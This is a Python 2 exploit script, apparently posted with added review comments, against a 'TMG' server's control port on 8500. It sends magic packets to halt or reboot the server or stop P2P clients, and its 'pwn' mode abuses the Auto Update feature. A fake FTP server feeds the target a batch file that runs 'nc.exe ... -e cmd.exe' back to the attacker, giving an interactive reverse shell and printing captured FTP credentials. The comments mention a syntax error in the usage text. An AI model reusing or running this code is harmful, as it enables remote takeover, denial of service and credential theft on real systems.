  1. #-----#
  2. #$> cat Too_Many_Greemlins_exposed_to_the_sunlight.py
  3. #-----#
  4.  
  5. #!/usr/bin/env python2
  6. # -*- coding: utf-8 -*-
  7.  
  8. import sys
  9. import struct
  10. import time
  11. import socket
  12. from threading import Thread
  13.  
#
# Change this IP to your public IP address.
#
# Address the remote side is told to connect back to. It is embedded in the
# UPDATE payload built in do_stuff() and written into the batch file served
# by fake_ftpd. Hard-coded here; it is not taken from the command line.
PUBLIC_IP = "192.168.0.1"

#
# Don't forget to open ports 21 and 8501 in your
# OpenOffice.org firewall
#
# SRV_PORT   - port on the target that the MAGIC+opcode messages go to.
# FTP_PORT   - local port fake_ftpd listens on for the target's fetch.
# SHELL_PORT - local port do_stuff() listens on for the connect-back.
SRV_PORT   = 8500
FTP_PORT   = 21
SHELL_PORT = 8501

# Wire format on SRV_PORT (Python 2: str is bytes): every request is the
# 4-byte MAGIC header followed by a one-byte opcode. STOP carries two extra
# zero bytes; UPDATE is followed by an address/port payload (see do_stuff).
# The fixed MAGIC prefix on inbound traffic to SRV_PORT is the most stable
# thing to match on when looking for this traffic in captures.
MAGIC  = "\x15\x66\x00\x78"
HALT   = "\x65"           # opcode: shut the server down (no reply is read)
REBOOT = "\x66"           # opcode: reboot the server (no reply is read)
STOP   = "\x70\x00\x00"   # opcode + 2 bytes: stop P2P clients; 1-byte reply expected
UPDATE = "\x82"           # opcode: auto-update; payload = IPv4 + port + "\x00\x00"
OK     = "\x01"           # first reply byte that do_stuff() treats as success
  33.  
def usage (msg = None):
  """Print an optional error line, then the command-line help, and exit.

  msg -- error text printed first (only when non-empty).
  Never returns: always ends with sys.exit(0), so even the error path
  reports exit status 0 to the caller.
  """

  if msg: print "Error: %s\n" % msg

  print "Usage: %s IP command" % sys.argv[0]
  print
  print "commands:"
  print "- halt    shutdown the server"
  print "- reboot  reboot the server"
  print "- stop    stop P2P clients (eMule and Shareaza)"
  # NOTE(review): as pasted, this string literal is split across two lines
  # with no continuation, which is a SyntaxError in both Python 2 and 3.
  print "- pwn     use a vulnerability in the Auto Update feature to
get a remote shell"

  sys.exit(0)
  48.  
class fake_ftpd(Thread):
    """Minimal FTP responder that serves two canned files to one client.

    Started as a daemon thread by do_stuff('pwn'). It accepts a single
    connection on FTP_PORT, answers just enough of the FTP dialogue
    (USER/PASS/CWD/TYPE/PORT/RETR/NLST/QUIT) for a fetch to succeed, and
    hands out the contents of self.files. Only active mode (PORT) is
    handled; there is no PASV branch.
    """

    def __init__ (self):
      """Load ./nc.exe and build the two files served under script/script_diff2/.

      The batch file renames the downloaded .txt back to nc.exe and runs it
      with "-e cmd.exe" against PUBLIC_IP:SHELL_PORT, i.e. it connects a
      command shell back to the listener opened in do_stuff(). Raises
      IOError if ./nc.exe is not in the current directory.
      """
      Thread.__init__(self)
      self.s = None
      f  = open('./nc.exe', 'rb')
      nc = f.read()
      f.close()
      batch  = "@echo off\r\n"
      batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
      batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
      # Path -> content. Keys are the exact names the client asks for via
      # RETR; the path prefix and these file names are the distinctive
      # on-disk / on-the-wire artefacts of this tool.
      self.files = {
        'script/script_diff2/execute_update.bat': batch,
        'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
      }

    def run (self):
      """Serve one FTP control session on FTP_PORT, then return.

      Thread body. Blocks in accept() until a client connects. Replies are
      fixed strings; only the PORT argument and the RETR/NLST path are
      parsed. The listening socket self.s is never closed here.
      """
      self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
      self.s.bind(("", FTP_PORT))
      self.s.listen(1)
      self.s.listen(0x1337)   # second listen() only replaces the backlog
      print "[+] Waiting for FTP connection..."

      conn, addr = self.s.accept()

      print "[!] FTP - %s connected!" % addr[0]
      conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")

      while True:
        data = conn.recv(1024)
        if not data:
          break

        # One recv() is assumed to hold exactly one command line.
        args = data.rstrip().split(' ')

        if data.startswith('CWD'):
          conn.send('250 CWD command successful.\r\n')

        elif data.startswith('TYPE'):
          conn.send('200 TYPE set.\r\n')

        elif data.startswith('USER'):
          conn.send('331 Password required.\r\n')
          username = data.split(' ')[1].rstrip()

        elif data.startswith('PASS'):
          conn.send('230 User logged in.\r\n')
          password = data.split(' ')[1].rstrip()
          # Any credentials are accepted; the pair the client presented is
          # printed. NameError if PASS arrives without a preceding USER.
          print "[!] TMG credentials: %s/%s" % (username, password)

        elif data.startswith('PORT'):
          # Active mode: "h1,h2,h3,h4,p1,p2" -> this side connects out to the
          # client's data port before acknowledging the command.
          arg  = args[1].split(',')
          ip   = '.'.join(arg[:4])
          port = int(arg[4]) * 256 + int(arg[5])
          sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          sdata.connect((ip, port))
          conn.send('200 PORT command successful.\r\n')

        elif data.startswith('RETR'):
          # sdata exists only after a PORT command; RETR before PORT raises
          # NameError. An unknown path is answered with the literal text
          # 'file not found' as the file body rather than a 550 reply.
          conn.send('150 Opening BINARY mode data connection\r\n')
          buf = self.files.get(args[1], 'file not found\r\n')
          sdata.send(buf)
          sdata.close()
          conn.send('226 Transfer complete\r\n')
          print "[+] File \"%s\" transfered..." % args[1]

        elif data.startswith('NLST'):
          # The "listing" is just the requested name echoed back (or empty).
          conn.send('150 Here comes the directory listing.\r\n')
          if len(args) == 1:
            listing = ''
          else:
            listing = args[1]
          sdata.send(listing + '\r\n')
          sdata.close()
          conn.send('226 Directory send OK.\r\n')

        elif data.startswith('QUIT'):
          conn.send('221 Goodbye.\r\n')
          break

        else:
          conn.send('500 Unknown command.\r\n')

      conn.close()
  134.  
  135.  
def do_stuff (host, cmd):
  """Connect to host:SRV_PORT and issue one of the four commands.

  host -- target address.
  cmd  -- 'halt', 'reboot', 'stop' or 'pwn' (validated by the caller).
  On connect failure prints the error and returns None. The 5 s timeout set
  below also applies to the recv() calls; a timeout there propagates as an
  uncaught socket.timeout. Python 2 only (print statements, except syntax,
  and str-indexing semantics in the OK comparisons).
  """

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.settimeout(5)

  try:
    print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
    s.connect((host, SRV_PORT))

  except Exception, e:
    print("[?] Error: %s" % e)
    s.close()
    return ;

  print "[+] Sending evil packet..."

  if cmd == 'halt':
    # Fire-and-forget: no reply is read for halt or reboot.
    s.send(MAGIC + HALT)
    print "[!] Done!"

  elif cmd == 'reboot':
    s.send(MAGIC + REBOOT)
    print "[!] Done!"

  elif cmd == 'stop':
    s.send(MAGIC + STOP)
    data = s.recv(1)

    # Python 2: data[0] is a 1-char str, so comparing it to OK works.
    if data and data[0] == OK:
      print "[!] Done!"
    else:
      print "[!] Error :("

  elif cmd == 'pwn':
    # Start the FTP responder first so it is already listening when the
    # server is told where to fetch its "update" from.
    ftpd = fake_ftpd()
    ftpd.daemon = True
    ftpd.start()

    # UPDATE payload: 4-byte IPv4 of PUBLIC_IP, 2-byte port, 2 zero bytes.
    # struct "h" is native-endian and signed; on a little-endian host the
    # ntohs() swap leaves the port in network byte order -- presumably what
    # the server's parser expects. TODO confirm against the server side.
    command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
socket.ntohs(FTP_PORT)) + "\x00\x00"
    s.send(MAGIC + UPDATE + command)
    data = s.recv(1)

    if data and data[0] == OK:
      # Server acknowledged: wait on SHELL_PORT for the connect-back made by
      # the batch file served from fake_ftpd (see fake_ftpd.__init__).
      s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
      s2.bind(("", SHELL_PORT))
      s2.listen(1)

      conn, addr = s2.accept()
      print "[!] SHELL - %s connected!" % addr[0]
      print conn.recv(4096)   # presumably the remote shell's banner/prompt

      # Interactive loop: one line per command; "quit"/"exit" ends it locally
      # (the strings are not sent to the remote side).
      while True:
        cmd = raw_input()
        if cmd == "quit" or cmd == "exit":
            break;
        conn.send(cmd + "\r\n")

        # First recv() blocks until something arrives; then drain with a
        # 1 s timeout until the remote side goes quiet or closes.
        data = ""
        conn.settimeout(None)
        data = conn.recv(1024)
        conn.settimeout(1)

        while True:
            line = ""
            try:
                line = conn.recv(1024)
            except socket.timeout:
                break
            if line == "":
                break
            data += line

        # Drop the first and last lines -- presumably the echoed command
        # and the trailing prompt -- before printing the output.
        tab = data.split("\n")
        print "\n".join(tab[1:-1])

      conn.close()
      # NOTE: the listener s2 is never closed.
    else:
      print "[!] Error :("

  s.close()
  218.  
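if __name__ == '__main__':
  # Entry point: <script> IP command. usage() prints help and exits, so each
  # failed check below terminates the process. The argument count is checked
  # in both directions: the original only rejected too few arguments, and a
  # surplus argument surfaced as a ValueError from the tuple unpacking.

  if len(sys.argv) < 3:
    usage("Not enough arguments")

  if len(sys.argv) > 3:
    usage("Too many arguments")

  (_, host, cmd) = sys.argv

  if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
    usage('Invalid command ("%s")' % cmd)

  do_stuff(host, cmd)

  sys.exit(0)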